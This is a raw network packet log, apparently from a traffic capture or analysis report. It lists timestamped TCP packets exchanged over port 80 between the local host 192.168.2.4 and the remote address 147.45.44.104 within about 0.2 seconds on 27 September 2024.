Sep 27, 2024 00:15:14.166100025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166109085 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166142941 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166363001 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166378975 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166394949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166419983 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166503906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166520119 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166534901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166552067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166562080 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166596889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166798115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166812897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166827917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166842937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166850090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166866064 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166867018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166883945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166898966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166910887 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166922092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166939020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.166948080 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.166975021 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167330980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167347908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167363882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167380095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167397976 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167402029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167414904 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167418957 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167435884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167449951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167467117 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167490005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167506933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167506933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167521954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167535067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167542934 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167573929 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167845964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167911053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167926073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167942047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.167963982 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.167980909 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168057919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168072939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168113947 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168128967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168144941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168159962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168176889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168189049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168200970 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168231010 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168427944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168448925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168492079 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168586016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168602943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168617010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168631077 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168646097 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168656111 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168669939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168684006 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168699980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168699980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168715954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168731928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168737888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168745041 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.168746948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168771029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.168785095 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169379950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169394970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169409037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169424057 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169440031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169446945 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169456005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169472933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169478893 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169487953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169504881 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169519901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169526100 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169537067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169552088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169564962 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169568062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.169586897 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.169606924 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170095921 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170120001 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170135021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170149088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170164108 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170172930 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170181990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170193911 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170197964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170213938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170226097 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170229912 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170245886 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170258999 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170260906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170278072 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170284033 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170295000 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170309067 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170312881 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170324087 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170340061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.170357943 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.170377970 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171056986 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171073914 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171088934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171104908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171118975 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171120882 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171135902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171138048 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171154022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171169043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171181917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171185017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171201944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171215057 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171222925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171237946 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171248913 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171252966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171271086 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.171274900 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.171327114 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.255194902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255225897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255242109 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255275965 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.255377054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255403042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255418062 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255434990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255460978 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.255578041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255702019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255717993 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255732059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255748034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255759954 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.255764961 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255783081 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255789995 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.255799055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.255868912 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256223917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256238937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256253958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256269932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256285906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256295919 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256300926 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256320000 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256325960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256345034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256366014 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256714106 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256730080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256745100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256759882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256773949 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256777048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256792068 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.256875992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.256876945 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257132053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257148027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257164955 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257179022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257194042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257194042 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257210016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257213116 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257226944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257247925 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257270098 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257584095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257599115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257613897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257627010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257642984 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257652044 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257668018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257682085 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257683992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257702112 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.257704973 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.257745981 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.259435892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259551048 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259566069 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259601116 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.259814978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259840012 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259855032 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259869099 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259885073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259887934 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.259903908 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.259922981 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.259968042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259984016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.259999990 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260021925 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260037899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260065079 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.260423899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260440111 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260453939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260468960 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260484934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260485888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.260499954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260509014 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.260516882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260531902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260548115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260550976 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.260562897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.260570049 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.260601044 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261147976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261163950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261183023 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261198997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261214018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261229992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261235952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261238098 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261254072 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261265993 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261271000 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261287928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261301041 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261303902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261321068 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261341095 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261358023 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261781931 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261830091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261846066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261862040 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261878014 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261882067 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261894941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.261919022 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.261941910 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262079954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262096882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262136936 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262279034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262295008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262310982 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262326002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262341976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262357950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262362957 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262372971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262377024 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262393951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262403011 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262411118 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262425900 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262450933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262454033 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262480021 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262764931 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262784958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262801886 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262811899 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262842894 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262881994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262897015 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.262959003 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.262989044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263005018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263020039 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263035059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263048887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263063908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263079882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263082981 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263082981 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263103008 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263113022 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263120890 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263161898 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263514996 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263530970 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263551950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263556004 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263571978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263587952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.263603926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.263622046 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343152046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343281031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343296051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343312025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343326092 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343329906 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343342066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343359947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343370914 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343400002 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343426943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343445063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343478918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.343508959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343524933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343539953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343554974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.343558073 CEST	49774	80	192.168.2.4	147.45.44.104
